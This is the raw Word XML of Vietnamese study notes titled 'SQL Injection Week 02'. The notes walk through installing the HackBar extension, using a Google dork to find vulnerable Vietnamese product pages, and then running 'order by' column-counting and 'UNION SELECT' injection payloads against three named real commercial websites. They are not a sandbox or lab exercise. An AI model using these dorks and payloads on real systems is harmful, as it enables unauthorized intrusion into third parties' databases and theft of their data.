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D5932C" w14:textId="1D0B5222" w:rsidR="001C30F5" w:rsidRPr="00004971" w:rsidRDefault="008C5B17" w:rsidP="008C5B17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vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> INJECTION WEEK 02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317EA19F" w14:textId="24D1D927" w:rsidR="008C5B17" w:rsidRPr="00004971" w:rsidRDefault="008C5B17" w:rsidP="008C5B17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004971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Thêm Extension Hack Bar </w:t>
      </w:r>
      <w:r w:rsidR="008528DE" w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00004971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rên Microsoft Edge </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB9C88E" w14:textId="6D571A6B" w:rsidR="008C5B17" w:rsidRPr="008C5B17" w:rsidRDefault="00000000" w:rsidP="008C5B17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:proofErr w:type="spellStart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>HackBar</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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 xml:space="preserve"> - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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>Cửa</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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>hàng</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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 xml:space="preserve"> Chrome </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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>trực</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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>tuyến</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="008C5B17" w:rsidRPr="008C5B17">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve"> (google.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A4F5190" w14:textId="43CFF01F" w:rsidR="008C5B17" w:rsidRPr="008C5B17" w:rsidRDefault="008C5B17" w:rsidP="008C5B17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8C5B17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Chọn tải để thêm vào, góc phải có extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E4A938" w14:textId="767322A1" w:rsidR="008C5B17" w:rsidRDefault="008C5B17" w:rsidP="008C5B17">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5B17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A0460B1" wp14:editId="0046665A">
            <wp:extent cx="2414076" cy="1249594"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8255"/>
            <wp:docPr id="1685884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425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2317" cy="12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9D14" w14:textId="77777777" w:rsidR="00004971" w:rsidRDefault="00004971" w:rsidP="008C5B17">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444C5773" w14:textId="1E4273B7" w:rsidR="008C5B17" w:rsidRPr="00004971" w:rsidRDefault="008C5B17" w:rsidP="008C5B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04971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I. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00004971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0049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28DE" w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">iếm </w:t>
      </w:r>
      <w:r w:rsidR="008528DE" w:rsidRPr="00004971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004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">rang </w:t>
      </w:r>
      <w:r w:rsidR="008528DE" w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008528DE" w:rsidRPr="00004971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00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ị</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000049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528DE" w:rsidRPr="00004971"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Pr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ỗi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712ED98B" w14:textId="4ECB0968" w:rsidR="008C5B17" w:rsidRPr="00155D39" w:rsidRDefault="008C5B17" w:rsidP="008C5B17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5B17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5B17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5B17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inurl:product_detail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5B17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5B17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5B17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">= site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5B17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FFA8D9A" w14:textId="7DFCCBB4" w:rsidR="00155D39" w:rsidRDefault="00155D39" w:rsidP="008C5B17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155D39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- web không bị lỗi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F1B0A" w14:textId="3734E7D4" w:rsidR="008528DE" w:rsidRPr="008528DE" w:rsidRDefault="008528DE" w:rsidP="008C5B17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8528DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://goope.jp/?gad_source=1&amp;gclid=CjwKCAjwlbu2BhA3EiwA3yXyu54Lcpv7P7SBCMPl6NwwwLewmiXwKRpviI4R4hGn-qdyL6ZPARkoMBoCU5wQAvD_BwE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57096CC8" w14:textId="0B12F409" w:rsidR="00155D39" w:rsidRPr="008C5B17" w:rsidRDefault="00155D39" w:rsidP="008C5B17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155D39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- web bị lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB0537C" w14:textId="2D2CE63F" w:rsidR="008C5B17" w:rsidRDefault="00000000" w:rsidP="008C5B17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00155D39" w:rsidRPr="00E13F49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>https://www.tapiocafeedfood.com/?php=product_detail&amp;id=295</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27652542" w14:textId="41ED28A1" w:rsidR="00004971" w:rsidRDefault="00004971" w:rsidP="00004971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004971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2027853E" wp14:editId="319AD790">
            <wp:extent cx="2645362" cy="1653069"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="2046998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989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8398" cy="16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6F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00004971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5317B5A1" wp14:editId="5859257F">
            <wp:extent cx="2634776" cy="1646453"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1922330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3077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1604" cy="16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3F6B" w14:textId="77777777" w:rsidR="00004971" w:rsidRDefault="00004971">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D68C9C" w14:textId="2C4127E4" w:rsidR="00004971" w:rsidRDefault="00000000" w:rsidP="00004971">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00004971" w:rsidRPr="00E13F49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>https://www.diencovothanhdat.com/?php=product_detail&amp;id=30</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00004971" w:rsidRPr="00004971">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171BBCF1" w14:textId="462C4AEA" w:rsidR="00155D39" w:rsidRPr="00004971" w:rsidRDefault="00004971" w:rsidP="00004971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004971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6DE510B1" wp14:editId="712D5258">
            <wp:extent cx="2780494" cy="1737511"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="730267046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67046" name="Picture 1" descr="A computer screen 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7672" cy="175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2"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00004971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5259EDD2" wp14:editId="7428D632">
            <wp:extent cx="2783410" cy="1739334"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="581581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8173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8467" cy="17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D324" w14:textId="67670B03" w:rsidR="00155D39" w:rsidRDefault="00000000" w:rsidP="008C5B17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00155D39" w:rsidRPr="00E13F49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=220</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="254DB544" w14:textId="6371F6FC" w:rsidR="00C000F1" w:rsidRDefault="00004971" w:rsidP="00004971">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68CE5167" wp14:editId="51CB11BD">
            <wp:extent cx="2774298" cy="1733641"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1501949830" name="Picture 1" descr="A computer screen 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49830" name="Picture 1" descr="A computer screen shot of a building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7748" cy="175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2"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="261D129E" wp14:editId="36FAEBE2">
            <wp:extent cx="2784899" cy="1740265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2054823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237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3190" cy="17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C7E3" w14:textId="77777777" w:rsidR="00004971" w:rsidRDefault="00004971" w:rsidP="00004971">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B5C82E" w14:textId="244C4D69" w:rsidR="008528DE" w:rsidRPr="00004971" w:rsidRDefault="00AB1984" w:rsidP="008C5B17">
      <w:pPr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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>II</w:t>
      </w:r>
      <w:r w:rsidR="008528DE" w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>. Kiểm Số Cột Của Table Mà SQL Truy Vấn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6518CA34" w14:textId="4466CB99" w:rsidR="00C000F1" w:rsidRDefault="008528DE" w:rsidP="00C000F1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8528DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.tapiocafeedfood.com/?php=product_detail&amp;id=295 order by </w:t>
      </w:r>
      <w:r w:rsidR="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>22--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4959BA5D" w14:textId="39392975" w:rsidR="00004971" w:rsidRDefault="00004971" w:rsidP="00004971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004971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4B9020D5" wp14:editId="45DA1B23">
            <wp:extent cx="2827649" cy="1763051"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="118151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14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9623" cy="177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971">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4F2BC8" w14:textId="77777777" w:rsidR="00004971" w:rsidRDefault="00004971">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E12F9A" w14:textId="387EB0BE" w:rsidR="00C000F1" w:rsidRDefault="00C000F1" w:rsidP="008C5B17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C000F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">https://www.diencovothanhdat.com/?php=product_detail&amp;id=30 order by </w:t>
      </w:r>
      <w:r w:rsidR="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>16—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E31F8A" w14:textId="546C6504" w:rsidR="00004971" w:rsidRDefault="00004971" w:rsidP="00004971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004971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5D6C31C7" wp14:editId="64E4CC4E">
            <wp:extent cx="2860328" cy="1787400"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="28487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749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4946" cy="17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1B35" w14:textId="4C18FD00" w:rsidR="00C000F1" w:rsidRDefault="00C000F1" w:rsidP="008C5B17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C000F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=220 order by 19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491A8641" w14:textId="3BF5C8AE" w:rsidR="00004971" w:rsidRDefault="00004971" w:rsidP="00004971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004971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5F209C17" wp14:editId="1DA9551B">
            <wp:extent cx="2898082" cy="1810991"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="377245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456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3367" cy="182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029A" w14:textId="77777777" w:rsidR="00C000F1" w:rsidRDefault="00C000F1" w:rsidP="008C5B17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27470AA8" w14:textId="1E464C79" w:rsidR="00004971" w:rsidRDefault="00AB1984" w:rsidP="008C5B17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III</w:t>
      </w:r>
      <w:r w:rsidR="00004971" w:rsidRPr="00004971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>. Kiểm Tra Một Số Cột Của Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFD3E86" w14:textId="54BA6D29" w:rsidR="00357B66" w:rsidRPr="00357B66" w:rsidRDefault="00357B66" w:rsidP="008C5B17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357B66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.tapiocafeedfood.com/?php=product_detail&amp;id=-295  UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD15421" w14:textId="15716052" w:rsidR="00C000F1" w:rsidRDefault="00C000F1" w:rsidP="00357B66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C000F1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3988F1DF" wp14:editId="4A20E60E">
            <wp:extent cx="3088706" cy="1743337"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="689481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810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2616" cy="17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13ED" w14:textId="77777777" w:rsidR="00357B66" w:rsidRDefault="00357B66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F91713E" w14:textId="0F83A20A" w:rsidR="00357B66" w:rsidRDefault="00357B66" w:rsidP="00357B66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357B66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.diencovothanhdat.com/?php=product_detail&amp;id=-30  UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62099192" w14:textId="1137C31B" w:rsidR="00357B66" w:rsidRDefault="00357B66" w:rsidP="00357B66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357B66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2344A951" wp14:editId="69A69F00">
